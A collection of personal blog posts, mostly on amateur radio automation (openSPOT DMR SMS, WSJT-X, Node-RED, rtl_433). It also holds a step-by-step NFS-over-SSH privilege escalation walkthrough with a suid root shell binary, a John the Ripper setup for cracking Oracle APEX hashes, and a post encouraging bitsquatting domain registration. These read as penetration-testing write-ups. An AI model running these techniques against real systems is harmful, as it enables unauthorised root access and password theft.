WSJT-X alerts to MD-380 with the openSPOT HTTP API

DMR SMS alerts using the SharkRF openSPOT with Node-RED

I recently acquired a SharkRF openSPOT for use as a hotspot to connect to the Brandmeister DMR network with my MD-380 DMR radio as I have no easily accessible repeaters nearby to use for DMR.

I have nothing but good things to say about this device: it works very well, the UI is simple to use, reported bugs are fixed very quickly and new features are added with new firmware. The icing on the cake is that it is a very accessible device, with an HTTP and UDP API to interact with! I’ve only toyed with some features in the HTTP API but I’m happy with what I’ve seen so far.

The first use I came up with for it was receiving DMR SMS messages on my MD-380 from my existing WSJT-X & Node-RED setup. The status-dmrsms API allows us to receive and send SMS messages over the local RF link to our connected DMR radio by specifying its DMR ID. This functionality works exactly as described in the API documentation, and if you follow it you will get a BEER.

BEER from the SharkRF openSPOT HTTP API

To get this working in Node-RED, a flow was needed to handle authentication. As described in the Login Process, we need to hash our openSPOT password with a provided token to get a digest for use in all communication with the API; this digest is valid for 60 minutes.

The flow below shows the authentication process as it is set up at the moment.

Node-RED openSPOT API Login

The inject at the beginning just sends a time stamp, which is unused, to kick this flow off on Node-RED start-up and every 30 minutes thereafter. After the login is posted, some global variables are set with the login status, the token and, if authentication was successful, the digest. This should tick away to ensure we have a valid digest to hand at all times.
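For anyone wanting to poke the same API outside Node-RED, a minimal Python sketch of the login exchange is below. The endpoint names (gettok.cgi, login.cgi) and the digest construction (SHA256 over token + password) are from my reading of the API docs at the time, so treat them as assumptions and check the Login Process documentation for your firmware.

import hashlib
import requests

OPENSPOT = "http://openspot.local"  # hypothetical address; use your openSPOT's IP
PASSWORD = "openspot"               # the device password

def login():
    # Ask the openSPOT for a one-time token (assumed endpoint name).
    token = requests.post(OPENSPOT + "/gettok.cgi").json()["token"]
    # Hash the token and password together to form the digest; the exact
    # construction is described in the Login Process docs (SHA256 assumed here).
    digest = hashlib.sha256((token + PASSWORD).encode()).hexdigest()
    resp = requests.post(OPENSPOT + "/login.cgi",
                         json={"token": token, "digest": digest}).json()
    if not resp.get("success"):
        raise RuntimeError("openSPOT login failed")
    return token, digest  # valid for 60 minutes, so re-login well before then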

The posting of messages is easy and exactly as documented in the API description. With the digest already in a global variable from the login process above, we take any text input, limit it to 75 characters, convert it to UTF16-BE hex and post it in the correct format for our radio. The full flow, including the message input from WSJT-X, is pictured below.

Full flow for using the openSPOT API

The inject function in the send flow is just there for testing purposes, to insert a test message manually, and the success function at the end just writes the status to the debug console.
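The send side can be sketched the same way: trim to 75 characters, encode as UTF16-BE hex and post it. The payload field names below are assumptions, so check the status-dmrsms documentation for the exact format.

import binascii
import requests

OPENSPOT = "http://openspot.local"  # as in the login sketch above

def send_dmr_sms(token, digest, dst_id, text):
    # The message goes over as UTF16-BE encoded hex, limited to 75 characters.
    hexmsg = binascii.hexlify(text[:75].encode("utf-16-be")).decode()
    payload = {
        "token": token,       # from the login flow
        "digest": digest,
        "dst_id": dst_id,     # DMR ID of the connected radio (field names assumed)
        "message": hexmsg,
    }
    return requests.post(OPENSPOT + "/status-dmrsms.cgi", json=payload).json()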

With the above all set up, we just wait for the DX to light up our DMR radio with an SMS message; the image below shows this on an earlier version of the same flow.

WSJT-X alerts to MD-380 with the openSPOT HTTP API

Alerts from Node-RED via Twitter or IRC might be easier, but at least with the above it is all contained on the RF side and doesn’t need the Internet 🙂

It has been running for a few days now and seems to be working fine. I’ll try and wrap it all up in a more easily deployed function if I get the time, but if anyone wants the nasty code before then, just drop me a line.


WSJT-X monitoring with py_wsjtx & Node-RED

An article about Node-RED by G4WNC in a recent Practical Wireless gave me the push to try and use it in my own radio set-up for alerting and monitoring using a spare Raspberry Pi.

The goal is to receive notifications when my own local radio spots a new DXCC on the HF bands or any WSPR/JT spots on 6m and above, and to plot the 2m JT65b beacons I can hear over time, amongst other things.

Prior to this I was only monitoring the beacons using a script and forwarding the results to openHAB over MQTT to display alongside some house statistics. This wasn’t too flexible, and openHAB is a bit of a burden on the Pi, which would randomly hang.

For this project I want to take inputs from different physical radios and an SDR, each feeding its own copy of WSJT-X, to display and log certain decodes and alert me in multiple ways if interesting things are seen.

The set-up currently has three radio inputs; each of these has a WSJT-X instance with its own configuration:

  1. HF Radio (IC-7300 and/or FT-817)
  2. VHF Radio (FT-847)
  3. GQRX (IF out of FT-847)

Input 1 is set to whatever I’ve left the HF radios monitoring.

Inputs 2 and 3 are usually set to monitor the two JT65B-enabled 2m beacons I can hear from this location, GB3VHF and GB3NGI, using the same antenna. I have this graphed in openHAB but it’s not working well, so at some point I will graph from the database using something else instead.

WSJT-X can output status messages and decodes over the network to a configured address; this is discussed in a previous blog post where we split the output to AlarmeJT and CQRLOG. We will add a third listener on an extra port, py_wsjtx.
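py_wsjtx does the real decoding for us below, but to show what actually arrives on the wire, here is a minimal Python sketch of a raw listener. As far as I recall from NetworkMessage.hpp in the WSJT-X source, each QDataStream-encoded datagram starts with a magic number, a schema version and a message type; the rest of the decode is left to py_wsjtx.

import socket
import struct

MAGIC = 0xADBCCBDA  # WSJT-X network message magic number

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 2237))  # the default WSJT-X UDP server port

while True:
    data, addr = sock.recvfrom(4096)
    if len(data) < 12:
        continue
    magic, schema, msg_type = struct.unpack(">III", data[:12])
    if magic == MAGIC:
        print("WSJT-X message type %d (schema %d) from %s" % (msg_type, schema, addr[0]))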

Py_wsjtx is a Python network listener that takes the network output from WSJT-X and displays it in a console, either line by line or in a curses interface. I have all of the WSJT-X instances sending their data to a single py_wsjtx instance.

py_wsjtx

As can be seen above, this is really handy for monitoring things from a console rather than the GUI, and it will highlight new DXCC spots and CQ calls. It can also output the decoded messages to an MQTT broker if configured, which comes in really useful for what we’re doing here.

Node-RED allows us to easily take these MQTT inputs, process them in whatever way we want and act upon them. The image below shows the current set-up.

Node-Red WSJTX

The purple boxes are MQTT inputs and outputs; each of these points to an MQTT broker (running on the same Raspberry Pi) and listens or sends messages for a particular topic. Py_wsjtx sends MQTT messages in the format py_wsjtx/WSJT-X radioname/messagetype, which makes it easy to configure Node-RED to process them in the correct manner, for instance filtering by radio or by decode type.
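To illustrate how convenient that topic layout is, the Python sketch below (using the paho-mqtt library rather than Node-RED) subscribes to everything py_wsjtx publishes and splits the topic back into radio name and message type; the payload is printed raw since the JSON conversion happens later in the flow.

import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    # Topic format: py_wsjtx/<WSJT-X radio name>/<message type>
    _, radio, msg_type = msg.topic.split("/", 2)
    print("[%s] %s: %s" % (radio, msg_type, msg.payload.decode()))

client = mqtt.Client()
client.on_message = on_message
client.connect("localhost", 1883)  # broker on the same Raspberry Pi
client.subscribe("py_wsjtx/#")     # everything py_wsjtx publishes
client.loop_forever()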

Working from the top row of the flow down:

  1. GQRX and FT847 JT65b beacon decodes are converted to JSON, then forwarded on in three ways:
    1. All decodes go to openHAB, which is graphing things at the moment; this is shown in the image below and copied to my qrz.com page. I’ll be changing this shortly to something more reliable/configurable.

Beacon monitoring

    2. All decodes are logged to a MySQL database, which I will use for generating graphs when we stop using openHAB.
    3. If the decodes are above the set levels, <5 for GB3NGI and <20 for GB3VHF, a post is sent to Twitter and to me on a local IRC server (see the sketch after this list).
  2. Next we have DXCC alerts from WSJT-X: if it spots a new country, a message is sent to Twitter and IRC with the spot, and hopefully I will see it and respond. To make it more interesting I had it ring the shack doorbell. I’ve got two ways to do this: using a HackRF to replay the wireless doorbell, which is a bit of a waste of an expensive SDR, or ringing via a second remote unit using the Pi GPIO pins. The ringer got annoying quickly so it’s now turned off; flashing a light may be better!
  3. Next up we have an input for any WSPR spots on any radio. I’m not doing much with this at the moment other than alerting me on local IRC/Twitter if there are any spots on 6m/4m/2m. I don’t often have WSPR listeners on these bands, but if I think conditions are looking likely I will switch one of the WSJT-X instances over.
  4. The solar inverter statistics are sent out on 433.9 MHz and I use an RTL-SDR dongle to receive and decode them with the program rtl_433. These are then rate limited and forwarded to openHAB as well as being written to the database.
  5. The other MQTT inputs are DHT11 temperature and humidity sensors in the house, hooked up to the various Pis I have. I’ve not got around to doing anything with these in Node-RED yet, but they are currently used by openHAB.
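The decode-level rule in item 1.3 boils down to a per-beacon threshold check. The flow does this in a Node-RED function node (JavaScript), but the same logic sketched in Python looks like the following; treat the threshold handling as illustrative.

# Thresholds from the flow above; how the levels are read depends on what
# WSJT-X reports for each decode, so treat these values as illustrative.
THRESHOLDS = {"GB3NGI": 5, "GB3VHF": 20}

def beacon_alert(beacon, level):
    """Return an alert string if this decode should go to Twitter/IRC."""
    threshold = THRESHOLDS.get(beacon)
    if threshold is not None and level < threshold:
        return "%s decode at level %s (threshold %s)" % (beacon, level, threshold)
    return None  # everything else is just logged to the database

# e.g. beacon_alert("GB3NGI", 3) -> alert; beacon_alert("GB3VHF", 25) -> None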

Not much more to say other than it works well for me. I plan on playing about with the flow some more, adding more alerting rules and cutting openHAB out of the solution entirely by graphing the outputs from the database in a more accessible way.

Solar PV Output in openHAB Using RTL_433

I’ve been playing a little with the fantastic open source home monitoring and automation solution openHAB on a Raspberry Pi 2. Having started off with some small temperature/humidity sensors I was looking for something else to add, and the stats from the solar panels were an obvious want.

I previously had the Inverter monitored using Auroramon as described here. This was great but it’s stopped working, and I’m putting off crawling around the attic to debug the issue for as long as possible.

I can keep an eye on the Inverter output using a standalone wireless monitor, the OWL Micro+, which has a small transmitter sensor clamped to the output from the Inverter giving current generation statistics. There is however no way of hooking this up to a computer to record the stats, so enter rtl_433.

The rtl_433 application uses an RTL SDR dongle to receive and decode a huge selection of wireless sensors transmitting on 433 MHz. I didn’t see the OWL device in the list but on running rtl_433 we see statistics generated every 15 seconds when power is being generated and totals every 60 seconds when there’s no generation.

Energy Sensor CM180 Id 62a0 power: 48W, total: 11242215648W, Total Energy: 3122.837kWh

With the output from this we can pull out the power generated and send it via an MQTT message, using mosquitto_pub, to the listening MQTT broker we already have openHAB set up to use.

This is ghastly but it works for now; for some reason the unit reads 48 W when idle so there’s a bit of fiddling to make it idle at 1:

rtl_433 2> /dev/null | xargs -I {} sh -c "mosquitto_pub -h 192.168.1.1 -t solar -m \$(echo {} | sed -e 's/, .*//' -e 's/^.*: \([0-9]\+\).*/\1/' | while read spo; do if [ \$spo -gt 50 ]; then echo \$spo; else echo 1; fi; done)"

I’ve since made some changes to my set-up where everything is now fed into node-red, which processes the MQTT messages, so the following is a bit simpler; it outputs JSON and lets node-red do the filtering:

rtl_433 -R 12 -F json 2> /dev/null | parallel --tty -k mosquitto_pub -h 192.168.1.1 -t solarout -m {}
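If you’d rather skip the shell pipework entirely, a few lines of Python can do the same job with the paho-mqtt library. A minimal sketch, assuming the CM180’s JSON output carries the wattage in a "power_W" field (check what your rtl_433 version actually emits) and reusing the idle fiddle from above:

import json
import subprocess
import paho.mqtt.publish as publish

# Run rtl_433 with JSON output and forward each power reading over MQTT.
proc = subprocess.Popen(["rtl_433", "-R", "12", "-F", "json"],
                        stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
for line in proc.stdout:
    try:
        reading = json.loads(line)
    except ValueError:
        continue                      # skip any non-JSON noise
    power = reading.get("power_W")    # assumed field name for the CM180
    if power is None:
        continue
    if power <= 50:                   # unit reads 48 W when idle, clamp to 1
        power = 1
    publish.single("solar", str(power), hostname="192.168.1.1")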

At the openHAB side I’ve an item “solar” set up and can see the current generation and day/week charts. It’s been running a few days now with no problem at all!


Future plans with this one will be to capture the output in a less Frankenstein manner or maybe risk broken ribs by crawling around the roof space to fix the monitor on the Inverter.


Using WSJT-X in Linux with CQRLOG and AlarmeJT

WSJT-X offers a handy UDP network service for two-way communication with other applications such as logging or monitoring software, but I had some difficulties using it with multiple applications at the same time.

WSJT-X is set up to communicate with a listening UDP server in the Settings->Reporting section as in the image below; by default it sends packets to localhost port 2237.

WSJT-X UDP Server Settings

There are a number of software packages in Linux that support this communication from WSJT-X, such as CQRLOG and AlarmeJT.

CQRLOG uses it in remote mode to allow automatic logging of QSOs from WSJT-X, saving a lot of time and avoiding errors.

AlarmeJT, pictured below, is a handy application that takes decodes and displays them alongside information such as whether the DXCC/locator is required, based on the logs provided to it, and can communicate back to WSJT-X to tune to the selected call.

AlarmeJT

The only problem is that, by default and as far as I understand, we can only use one of these programs at a time with WSJT-X. WSJT-X sends its UDP traffic to one address/port, but each of the two consuming applications will try to exclusively bind this port, preventing the other application from doing the same.

WSJT-X can be configured to send to multicast addresses to allow multiple applications on the network to consume the same data. However, I’m running both applications on the same workstation; on top of the binding issues, one of the applications doesn’t allow the listener IP to be set and the other wouldn’t let me change the settings at all. So the plan was to find some way of duplicating the UDP packets to multiple destinations.

Some Startpage searching before attempting to do this with iptables or Python (a quick test indicated it would be possible) identified an already written user-space tool, samplicator, that does the forwarding we need here. It is easy to compile and use.
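As an aside, the quick Python test amounted to something like the sketch below: bind where WSJT-X sends and copy every datagram onwards. It works, but it forwards from its own address rather than spoofing the source, which matters for the two-way traffic covered below; samplicator handles that for us.

import socket

LISTEN = ("127.0.0.1", 2000)                        # where WSJT-X sends
DESTS = [("127.0.0.1", 2237), ("127.0.0.1", 2238)]  # AlarmeJT and CQRLOG

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(LISTEN)

while True:
    # Copy each UDP datagram, unmodified, to every consumer.
    data, _ = sock.recvfrom(65535)
    for dest in DESTS:
        sock.sendto(data, dest)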

The idea is to have WSJT-X configured to send to the samplicator listener on local port 2000 and have it send copies of the received packets to a CQRLOG listener on port 2238 and also to an AlarmeJT listener on the default port 2237.

Packet Flow
The command to implement this is as below and I’ve put it in my /etc/rc.local to run at boot.

samplicate -S -p 2000 127.0.0.1/2237 127.0.0.1/2238

Here we are listening on port 2000 and forwarding copies of the UDP packets to 127.0.0.1 ports 2237 and 2238. The -S option is especially handy as it spoofs the source addresses to appear exactly as sent, which allows the consuming applications to communicate in response, such as tuning to a station when clicking on a CQ in AlarmeJT; without this set they can only consume the data.

It seems to work well with the limited traffic we’re using here and lets me parse decodes quickly for their statistics, tune quickly to calls and to log the successful QSO automatically. Now I just need to make a few hundred contacts to make up for the time spent fiddling about with this stuff to save time…

NFS Pivoting Via SSH For Easy Privilege Escalation And More

It’s easy to take advantage of insecure NFS mounts to escalate privileges on a system you have user-level SSH access to, without introducing any tools to the remote system, by tunnelling our NFS traffic so that our source appears to be the target server. This can be done without direct network access to the NFS server and does not require us to be defined in the export’s access control list. If the NFS server were directly accessible and mountable from our location we would just do this the normal way and mount directly.

In this instance the set-up might be a Linux server that has a mounted NFS export without root_squash or secure set, and mounted without the nosuid or noexec options. This situation is not that uncommon in NFS-heavy environments.

We also do not need to be able to route directly to the NFS server from our attacker location, so its being in an inaccessible or firewalled zone doesn’t cause a problem. By tunnelling the NFS connection using SSH port forwarding we will be assuming the identity of the target server, so if an export is available to it, it’s available to us!

The three systems described in the scenario are as below; the NFS server is only accessible to the target system here.

      +----------+   +--------+   +------------+
      | Attacker |-->| Target |-->| NFS Server |
      +----------+   +--------+   +------------+

First, check the mounted file systems on the target system with the mount command, looking for an already mounted NFS export that you have read access to and that is not mounted with the nosuid/noexec options:

nfs-filer:/export/filesystem1 on /filesystem1 type nfs (rw,addr=1.2.3.4)

Take a note of the IP address of the NFS server, and also note other exported file systems that may be available to the target but not mounted, using showmount -e.

Back on the attacker system, ssh to the target and port forward the local NFS port 2049 to the remote NFS server port 2049 via the target.

attacker # ssh -L 2049:NFS-Server-IP:2049 ouruser@target

Now, as long as the above was successful, on the attacker’s system as root we locally mount the chosen export using our forwarded port.

attacker # mount -v -t nfs -o port=2049,tcp localhost:/export/filesystem1 /mnt/filesystem1

Now on the attacker system we check that we can access the contents of /mnt/filesystem1 and that we have write access as root, by creating a file and checking the owner on the target system; it should be owned by root.

attacker # touch /mnt/filesystem1/.nfstest

target $ ls -l /filesystem1/.nfstest
-rw-r--r-- 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest

Now back on the attacker host we can chmod +s this file to check that suid files can be created, and we should hopefully see the following:

attacker # chmod +s /mnt/filesystem1/.nfstest

target $ ls -l /filesystem1/.nfstest
-rwsr-sr-s 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest

Now if we want to take advantage of this, on the attacker system we can do something like the following to create a suid binary; this can be compiled on the remote file system or the attacker system depending on the circumstances.

attacker # cat suidsh.c
#include <unistd.h>
int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", (char *)NULL); }
attacker # gcc -o /mnt/filesystem1/.nfstest suidsh.c
attacker # chmod +s /mnt/filesystem1/.nfstest

Now head on over to the target system and do the deed:

target $ ls -l /filesystem1/.nfstest
-rwsr-sr-s 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest
target $ id
uid=1000(luser) gid=1000(luser) groups=1000(lusers)
target $ /filesystem1/.nfstest
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.1# #bingo :)

Even if the above fails due to root squashing, nosuid or some other reason, we still have access to the contents of the exported file system via our tunnelled mount, which in itself might provide enough win.

Another thing we can do is mount file systems that are available to the target system even if they are not mounted by it. It’s always worth having a look around for other NFS exports or servers that might be available to the target and can be tunnelled in this way.

A few NFS export options can be set to prevent the above. The secure option requires connections to come from a port below 1024, meaning our mounting as a normal user over an SSH tunnel would not work. root_squash, which is a common default now, would also prevent us becoming root; however we may still be able to become another user or alter their content, which might lead to root privileges. The local mount options nosuid and noexec would prevent suid and executable files on the mount, but again there may be other ways to escalate depending on the file system contents.

The above will also not work if SSH port forwarding has been disabled; however, with shell access on the target system we can just do this another way if need be. We could also do a lot of the above with user-space tools introduced to the target system, but I prefer solutions that do not require uploading tooling to systems wherever possible.

Some Bitsquatting Observations

I registered a basketful of bitsquatting domains last year, and as they all recently expired I thought I’d share a few observations about my experience.

The idea is that memory errors on end devices or intermediate equipment result in occasional bits being flipped in memory. Where one of these flips happens to land on a domain name in memory, the flip might change it to another valid character and send traffic to the corrupted domain instead. While these errors are exceptionally rare, the internet is exceptionally big, so we can observe this behaviour with high enough traffic domains. You can read about it here, and there’s a good video here about this and other fun DNS stuff.
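To get a feel for a domain’s exposure, the candidate squats are easy to enumerate: flip each of the eight bits of every character and keep the results that are still valid hostname characters. A quick Python sketch, assuming a lowercase input domain:

import string

VALID = set(string.ascii_lowercase + string.digits + "-")

def bitflips(domain):
    """Yield the single-bit-flip variants that are still valid names."""
    for i, ch in enumerate(domain):
        if ch == ".":
            continue  # a flipped dot would change the label structure
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit)).lower()
            if flipped in VALID and flipped != ch:
                yield domain[:i] + flipped + domain[i + 1:]

# e.g. sorted(set(bitflips("gstatic.com"))) lists the candidate squat domains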

Now despite reading the papers and seeing the presentations it still seemed a bit far out, so as domains are cheap I registered a few to validate this for myself, as it looked quite fun. I was surprised at the time that so many squats were available despite this being a well-known issue with talks given at Defcon; even the exact domains provided in papers/talks were available. I was also a bit disappointed at this: are the companies subject to the publicised squats not interested in preventing further abuse? And why was the security community not picking these up to validate for themselves, or just for a laugh? Oh well..

My set-up used a slightly modified copy of dnschef to serve requests, a web server logging connections and headers, smtp-sink to log emails, and logging of DNS lookups and some other traffic with tcpdump. Unfortunately, due to a cock-up, I blew the six months of results away in a botched migration. Oh well..

I pretty much ended up with the same observations as others that presented their findings: lots of requests for well-used domain names, a significant number from mobile devices, and not many verifiable bit-flip hits on the less popular domains.

There were a decent number of requests that could have been pretty bad for the squatted organisation had they been taken advantage of, such as lookups for internal host names from the organisations themselves, and requests for certificates, software updates and the like.

No valid SMTP traffic was observed while logging email headers, but there was an insane quantity of spam. I’m not entirely sure whether the spammers had been subject to bit flips or whether they just had typos in their lists, but it was enough to make me give up on this monitoring very quickly.

As about 12 months had passed since my disappointment at so many of the squat domains being available, I compared their availability now to then. This time around there was a more marked change.

One example would be in the gstatic.com domain that was used in the demonstrations and presentations:

  • gstatic.com – October 2013 – 26 squats unregistered
  • gstatic.com – October 2014 – 0 squats unregistered

This reduction in availability was observed in other domains too. Interestingly, most of the gstatic squats and some of the other domains appear to have been registered by the same individual, with name servers at bitfl1p.com, so at least someone is having fun 🙂

I’d recommend trying some bitsquatting out; it’s easy and cheap to do, and with some careful domain choice it can lead you to some amusing and unpredictable results. Plus it’s funky knowing that a cosmic ray might just be the cause of that traffic coming your way!

Cracking APEX Hashes with John, Long Salts

Cracking APEX hashes with john the ripper doesn’t often cause me any bother, but I’ve come across two instances where john would not crack the hashes provided. This turned out to be due to the user name and workspace it uses as a salt being too long.

The easiest way to obtain the hashes, with access to the database, is using dump-apex-hashes.sql, making sure to alter the schema to match the version you are using. After this we can reformat with apex2john.py and crack away. The semi-automated process, along with the manual process, is described well here.

The john input we might end up with after following the above steps is:

$dynamic_1$f96d32cbb2fbe17732c3bbab91c14f3a$10ADMIN

Cracking this APEX hash with john results in the following:

Loaded 1 password hash (dynamic_1: md5($p.$s) (joomla) [128/128 SSE2 intrinsics 10x4x3])
password (?)

The above hash uses the trailing 10ADMIN string as the salt. This salt is made up of the workspace name plus the user name; to demonstrate, we can see the following example matches the hash cracked as “password” above:

>>> import hashlib
>>> print hashlib.md5("password" + "10" + "ADMIN").hexdigest()
f96d32cbb2fbe17732c3bbab91c14f3a

Where I’ve had a problem is when the workspace name plus the user name is greater than 31 characters; quite why someone would pick such a long workspace name I don’t know, but they do!

When this salt ends up over 31 characters we run into a problem: john no longer picks it up as valid:

cat apex;./john apex 
$dynamic_1$98d706b82b654265e71ea7db05eccbfa$4782602601579360ABCDEFGHIJKLMNOPQ
No password hashes loaded (see FAQ)

Adding the following dedicated APEX configuration to john’s dynamic.conf file will allow us to use dynamic_1011 to crack the hashes; the main difference being that this one doesn’t have a maximum “Saltlen”.

####################################################################
# Crack APEX hashes with long salts - Radwire
####################################################################
[List.Generic:dynamic_1011]
Expression=md5($p.$s) (APEX long salts)
Flag=MGF_SALTED
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_keys
Func=DynamicFunc__append_salt
Func=DynamicFunc__crypt_md5
Test=$dynamic_1011$B932A7CB1C06A03310921989DACBA3F7$4782602601579360ABCDEFGHIJKLMNO:password

Now when we try again after substituting dynamic_1 with dynamic_1011, we see that the hash which wasn’t picked up before now cracks okay:

cat apex;./john apex
$dynamic_1011$98d706b82b654265e71ea7db05eccbfa$4782602601579360ABCDEFGHIJKLMNOPQ
Loaded 1 password hash (dynamic_1011 md5($p.$s) (APEX long salts) [128/128 SSE2 intrinsics 10x4x3])
password1        (?)
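As with the short salt earlier, it’s worth sanity-checking john’s output by hand, given the format is just md5($p.$s); only the concatenated workspace-plus-username salt matters here:

import hashlib

def check_apex(password, salt, md5hash):
    # md5($p.$s): the salt is the workspace name plus the user name
    return hashlib.md5((password + salt).encode()).hexdigest() == md5hash.lower()

# The long-salt hash john loaded as dynamic_1011 above:
print(check_apex("password1", "4782602601579360ABCDEFGHIJKLMNOPQ",
                 "98d706b82b654265e71ea7db05eccbfa"))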